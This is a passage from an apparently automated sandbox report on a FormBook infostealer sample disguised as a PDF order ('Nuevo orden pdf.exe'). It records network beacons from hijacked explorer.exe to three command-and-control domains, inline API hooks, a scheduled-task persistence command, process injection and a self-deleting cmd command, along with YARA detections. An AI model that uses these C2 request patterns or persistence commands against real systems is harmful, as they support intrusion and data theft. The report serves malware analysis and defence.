                                                    May 4, 2021 20:33:56.612833977 CEST | 80 | 49736 | 34.102.136.180 | 192.168.2.3
                                                    May 4, 2021 20:33:56.612957954 CEST | 49736 | 80 | 192.168.2.3 | 34.102.136.180
                                                    May 4, 2021 20:33:56.613141060 CEST | 49736 | 80 | 192.168.2.3 | 34.102.136.180
                                                    May 4, 2021 20:33:56.653806925 CEST | 80 | 49736 | 34.102.136.180 | 192.168.2.3
                                                    May 4, 2021 20:33:56.750116110 CEST | 80 | 49736 | 34.102.136.180 | 192.168.2.3
                                                    May 4, 2021 20:33:56.750138998 CEST | 80 | 49736 | 34.102.136.180 | 192.168.2.3
                                                    May 4, 2021 20:33:56.750308037 CEST | 49736 | 80 | 192.168.2.3 | 34.102.136.180
                                                    May 4, 2021 20:33:56.750432968 CEST | 49736 | 80 | 192.168.2.3 | 34.102.136.180
                                                    May 4, 2021 20:33:56.792601109 CEST | 80 | 49736 | 34.102.136.180 | 192.168.2.3

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 4, 2021 20:31:58.183655024 CEST | 51281 | 53 | 192.168.2.3 | 8.8.8.8
May 4, 2021 20:31:58.205101967 CEST | 53 | 50200 | 8.8.8.8 | 192.168.2.3
May 4, 2021 20:31:58.218801975 CEST | 49199 | 53 | 192.168.2.3 | 8.8.8.8
May 4, 2021 20:31:58.232309103 CEST | 53 | 51281 | 8.8.8.8 | 192.168.2.3
May 4, 2021 20:31:58.269588947 CEST | 53 | 49199 | 8.8.8.8 | 192.168.2.3
May 4, 2021 20:31:59.400675058 CEST | 50620 | 53 | 192.168.2.3 | 8.8.8.8
May 4, 2021 20:31:59.449636936 CEST | 53 | 50620 | 8.8.8.8 | 192.168.2.3
May 4, 2021 20:32:00.909538984 CEST | 64938 | 53 | 192.168.2.3 | 8.8.8.8
May 4, 2021 20:32:00.962876081 CEST | 53 | 64938 | 8.8.8.8 | 192.168.2.3
May 4, 2021 20:32:01.809108973 CEST | 60152 | 53 | 192.168.2.3 | 8.8.8.8
May 4, 2021 20:32:01.857821941 CEST | 53 | 60152 | 8.8.8.8 | 192.168.2.3
May 4, 2021 20:32:01.935019016 CEST | 57544 | 53 | 192.168.2.3 | 8.8.8.8
May 4, 2021 20:32:01.995974064 CEST | 53 | 57544 | 8.8.8.8 | 192.168.2.3
May 4, 2021 20:32:03.024872065 CEST | 55984 | 53 | 192.168.2.3 | 8.8.8.8
May 4, 2021 20:32:03.073698044 CEST | 53 | 55984 | 8.8.8.8 | 192.168.2.3
May 4, 2021 20:32:04.074101925 CEST | 64185 | 53 | 192.168.2.3 | 8.8.8.8
May 4, 2021 20:32:04.125842094 CEST | 53 | 64185 | 8.8.8.8 | 192.168.2.3
May 4, 2021 20:32:05.436235905 CEST | 65110 | 53 | 192.168.2.3 | 8.8.8.8
May 4, 2021 20:32:05.485742092 CEST | 53 | 65110 | 8.8.8.8 | 192.168.2.3
May 4, 2021 20:32:06.437875986 CEST | 58361 | 53 | 192.168.2.3 | 8.8.8.8
May 4, 2021 20:32:06.487046003 CEST | 53 | 58361 | 8.8.8.8 | 192.168.2.3
May 4, 2021 20:32:07.462248087 CEST | 63492 | 53 | 192.168.2.3 | 8.8.8.8
May 4, 2021 20:32:07.515238047 CEST | 53 | 63492 | 8.8.8.8 | 192.168.2.3
May 4, 2021 20:32:08.652471066 CEST | 60831 | 53 | 192.168.2.3 | 8.8.8.8
May 4, 2021 20:32:08.701133966 CEST | 53 | 60831 | 8.8.8.8 | 192.168.2.3
May 4, 2021 20:32:09.570100069 CEST | 60100 | 53 | 192.168.2.3 | 8.8.8.8
May 4, 2021 20:32:09.623348951 CEST | 53 | 60100 | 8.8.8.8 | 192.168.2.3
May 4, 2021 20:32:10.825794935 CEST | 53195 | 53 | 192.168.2.3 | 8.8.8.8
May 4, 2021 20:32:10.876168966 CEST | 53 | 53195 | 8.8.8.8 | 192.168.2.3
May 4, 2021 20:32:11.954246998 CEST | 50141 | 53 | 192.168.2.3 | 8.8.8.8
May 4, 2021 20:32:12.005791903 CEST | 53 | 50141 | 8.8.8.8 | 192.168.2.3
May 4, 2021 20:32:13.437654018 CEST | 53023 | 53 | 192.168.2.3 | 8.8.8.8
May 4, 2021 20:32:13.486207008 CEST | 53 | 53023 | 8.8.8.8 | 192.168.2.3
May 4, 2021 20:32:14.739033937 CEST | 49563 | 53 | 192.168.2.3 | 8.8.8.8
May 4, 2021 20:32:14.790641069 CEST | 53 | 49563 | 8.8.8.8 | 192.168.2.3
May 4, 2021 20:32:16.254549980 CEST | 51352 | 53 | 192.168.2.3 | 8.8.8.8
May 4, 2021 20:32:16.306952953 CEST | 53 | 51352 | 8.8.8.8 | 192.168.2.3
May 4, 2021 20:32:17.547317982 CEST | 59349 | 53 | 192.168.2.3 | 8.8.8.8
May 4, 2021 20:32:17.596081972 CEST | 53 | 59349 | 8.8.8.8 | 192.168.2.3
May 4, 2021 20:32:18.649224043 CEST | 57084 | 53 | 192.168.2.3 | 8.8.8.8
May 4, 2021 20:32:18.698066950 CEST | 53 | 57084 | 8.8.8.8 | 192.168.2.3
May 4, 2021 20:32:32.163991928 CEST | 58823 | 53 | 192.168.2.3 | 8.8.8.8
May 4, 2021 20:32:32.235934973 CEST | 53 | 58823 | 8.8.8.8 | 192.168.2.3
May 4, 2021 20:32:49.475682020 CEST | 57568 | 53 | 192.168.2.3 | 8.8.8.8
May 4, 2021 20:32:49.526153088 CEST | 53 | 57568 | 8.8.8.8 | 192.168.2.3
May 4, 2021 20:32:53.355766058 CEST | 50540 | 53 | 192.168.2.3 | 8.8.8.8
May 4, 2021 20:32:53.416126013 CEST | 53 | 50540 | 8.8.8.8 | 192.168.2.3
May 4, 2021 20:33:03.694046974 CEST | 54366 | 53 | 192.168.2.3 | 8.8.8.8
May 4, 2021 20:33:03.752305984 CEST | 53 | 54366 | 8.8.8.8 | 192.168.2.3
May 4, 2021 20:33:15.336529970 CEST | 53034 | 53 | 192.168.2.3 | 8.8.8.8
May 4, 2021 20:33:16.000143051 CEST | 53 | 53034 | 8.8.8.8 | 192.168.2.3
May 4, 2021 20:33:22.251682043 CEST | 57762 | 53 | 192.168.2.3 | 8.8.8.8
May 4, 2021 20:33:22.322088003 CEST | 53 | 57762 | 8.8.8.8 | 192.168.2.3
May 4, 2021 20:33:29.678556919 CEST | 55435 | 53 | 192.168.2.3 | 8.8.8.8
May 4, 2021 20:33:29.739419937 CEST | 53 | 55435 | 8.8.8.8 | 192.168.2.3
May 4, 2021 20:33:35.713857889 CEST | 50713 | 53 | 192.168.2.3 | 8.8.8.8
May 4, 2021 20:33:35.781704903 CEST | 53 | 50713 | 8.8.8.8 | 192.168.2.3
May 4, 2021 20:33:56.504192114 CEST | 56132 | 53 | 192.168.2.3 | 8.8.8.8
May 4, 2021 20:33:56.570712090 CEST | 53 | 56132 | 8.8.8.8 | 192.168.2.3
May 4, 2021 20:33:59.694628954 CEST | 58987 | 53 | 192.168.2.3 | 8.8.8.8
May 4, 2021 20:33:59.745659113 CEST | 53 | 58987 | 8.8.8.8 | 192.168.2.3
May 4, 2021 20:34:01.708457947 CEST | 56579 | 53 | 192.168.2.3 | 8.8.8.8
May 4, 2021 20:34:01.773356915 CEST | 53 | 56579 | 8.8.8.8 | 192.168.2.3

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
May 4, 2021 20:33:15.336529970 CEST | 192.168.2.3 | 8.8.8.8 | 0x87dd | Standard query (0) | www.thefuture101.com | A (IP address) | IN (0x0001)
May 4, 2021 20:33:35.713857889 CEST | 192.168.2.3 | 8.8.8.8 | 0xbb8f | Standard query (0) | www.mediatraining-toronto.com | A (IP address) | IN (0x0001)
May 4, 2021 20:33:56.504192114 CEST | 192.168.2.3 | 8.8.8.8 | 0xe34c | Standard query (0) | www.bluevistainvestments.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
May 4, 2021 20:33:16.000143051 CEST | 8.8.8.8 | 192.168.2.3 | 0x87dd | No error (0) | www.thefuture101.com | thefuture101.com | - | CNAME (Canonical name) | IN (0x0001)
May 4, 2021 20:33:16.000143051 CEST | 8.8.8.8 | 192.168.2.3 | 0x87dd | No error (0) | thefuture101.com | - | 178.128.103.114 | A (IP address) | IN (0x0001)
May 4, 2021 20:33:35.781704903 CEST | 8.8.8.8 | 192.168.2.3 | 0xbb8f | No error (0) | www.mediatraining-toronto.com | mediatraining-toronto.com | - | CNAME (Canonical name) | IN (0x0001)
May 4, 2021 20:33:35.781704903 CEST | 8.8.8.8 | 192.168.2.3 | 0xbb8f | No error (0) | mediatraining-toronto.com | - | 184.168.131.241 | A (IP address) | IN (0x0001)
May 4, 2021 20:33:56.570712090 CEST | 8.8.8.8 | 192.168.2.3 | 0xe34c | No error (0) | www.bluevistainvestments.com | bluevistainvestments.com | - | CNAME (Canonical name) | IN (0x0001)
May 4, 2021 20:33:56.570712090 CEST | 8.8.8.8 | 192.168.2.3 | 0xe34c | No error (0) | bluevistainvestments.com | - | 34.102.136.180 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• www.thefuture101.com
• www.mediatraining-toronto.com
• www.bluevistainvestments.com

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49728 | 178.128.103.114 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
May 4, 2021 20:33:17.211909056 CEST | 1372 | OUT | GET /sqxs/?Ef=w0QgkeD38IHRIdpbCIGaty7sV88cqzXhWLmJ40eLjOUR8JRp45mybBQ5KmZt/1kyJcny&ojl0d=RzuhPJ HTTP/1.1
    Host: www.thefuture101.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:
May 4, 2021 20:33:17.513118982 CEST | 1372 | IN | HTTP/1.1 404 Not Found
    Server: nginx/1.16.1
    Date: Tue, 04 May 2021 18:33:17 GMT
    Content-Type: text/html; charset=iso-8859-1
    Content-Length: 203
    Connection: close
    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 71 78 73 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /sqxs/ was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.3 | 49735 | 184.168.131.241 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
May 4, 2021 20:33:35.976903915 CEST | 5539 | OUT | GET /sqxs/?Ef=GovnwUyBgs6xiYQW/zP+CA3Z06ENiLPJ6FoyDogwOk1ZQfWjapvzV/e42GR+qjeaq8An&ojl0d=RzuhPJ HTTP/1.1
    Host: www.mediatraining-toronto.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:
May 4, 2021 20:33:36.241235971 CEST | 5540 | IN | HTTP/1.1 301 Moved Permanently
    Server: nginx/1.16.1
    Date: Tue, 04 May 2021 18:33:36 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    Location: https://www.richardmaxwell.ca/sqxs/?Ef=GovnwUyBgs6xiYQW/zP+CA3Z06ENiLPJ6FoyDogwOk1ZQfWjapvzV/e42GR+qjeaq8An&ojl0d=RzuhPJ
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.3 | 49736 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
May 4, 2021 20:33:56.613141060 CEST | 5542 | OUT | GET /sqxs/?Ef=rJ59qlVpBd2p2MzE9PeUClXd0JALEtveJTDdwZJeh/IadIDZ7Pe72xE/unf7IFRjfuAh&ojl0d=RzuhPJ HTTP/1.1
    Host: www.bluevistainvestments.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:
May 4, 2021 20:33:56.750116110 CEST | 5542 | IN | HTTP/1.1 403 Forbidden
    Server: openresty
    Date: Tue, 04 May 2021 18:33:56 GMT
    Content-Type: text/html
    Content-Length: 275
    ETag: "6089be8c-113"
    Via: 1.1 google
    Connection: close
    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Code Manipulations

User Modules

Hook Summary

Function Name | Hook Type | Active in Processes
PeekMessageA | INLINE | explorer.exe
PeekMessageW | INLINE | explorer.exe
GetMessageW | INLINE | explorer.exe
GetMessageA | INLINE | explorer.exe

Processes

Process: explorer.exe, Module: user32.dll
Function Name | Hook Type | New Data
PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x80 0x0E 0xEA
PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x88 0x8E 0xEA
GetMessageW | INLINE | 0x48 0x8B 0xB8 0x88 0x8E 0xEA
GetMessageA | INLINE | 0x48 0x8B 0xB8 0x80 0x0E 0xEA

Statistics

Behavior


System Behavior

General

Start time: 20:32:06
Start date: 04/05/2021
Path: C:\Users\user\Desktop\Nuevo orden pdf.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\Nuevo orden pdf.exe'
Imagebase: 0x8c0000
File size: 907776 bytes
MD5 hash: 02A32CC05EFBF5236A8C0928D3C9170E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.229057760.0000000002E31000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.230107043.0000000003E39000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.230107043.0000000003E39000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.230107043.0000000003E39000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

General

Start time: 20:32:12
Start date: 04/05/2021
Path: C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit): true
Commandline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\NkwKQPLeekw' /XML 'C:\Users\user\AppData\Local\Temp\tmpA401.tmp'
Imagebase: 0x1160000
File size: 185856 bytes
MD5 hash: 15FF7D8324231381BAD48A052F85DF04
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 20:32:12
Start date: 04/05/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6b2800000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 20:32:13
Start date: 04/05/2021
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit): true
Commandline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Imagebase: 0x470000
File size: 45152 bytes
MD5 hash: 2867A3817C9245F7CF518524DFD18F28
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.271343185.0000000000930000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.271343185.0000000000930000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.271343185.0000000000930000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.271322606.0000000000900000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.271322606.0000000000900000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.271322606.0000000000900000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.271211976.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.271211976.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.271211976.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: high

General

Start time: 20:32:15
Start date: 04/05/2021
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline:
Imagebase: 0x7ff714890000
File size: 3933184 bytes
MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 20:32:30
Start date: 04/05/2021
Path: C:\Windows\SysWOW64\cmmon32.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\cmmon32.exe
Imagebase: 0x11a0000
File size: 36864 bytes
MD5 hash: 2879B30A164B9F7671B5E6B2E9F8DFDA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.480288139.0000000000E00000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.480288139.0000000000E00000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.480288139.0000000000E00000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.483002264.0000000004B00000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.483002264.0000000004B00000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.483002264.0000000004B00000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.482531961.00000000049A0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.482531961.00000000049A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.482531961.00000000049A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: moderate

General

Start time: 20:32:35
Start date: 04/05/2021
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
Imagebase: 0x110000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 20:32:35
Start date: 04/05/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6b2800000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Disassembly

Code Analysis
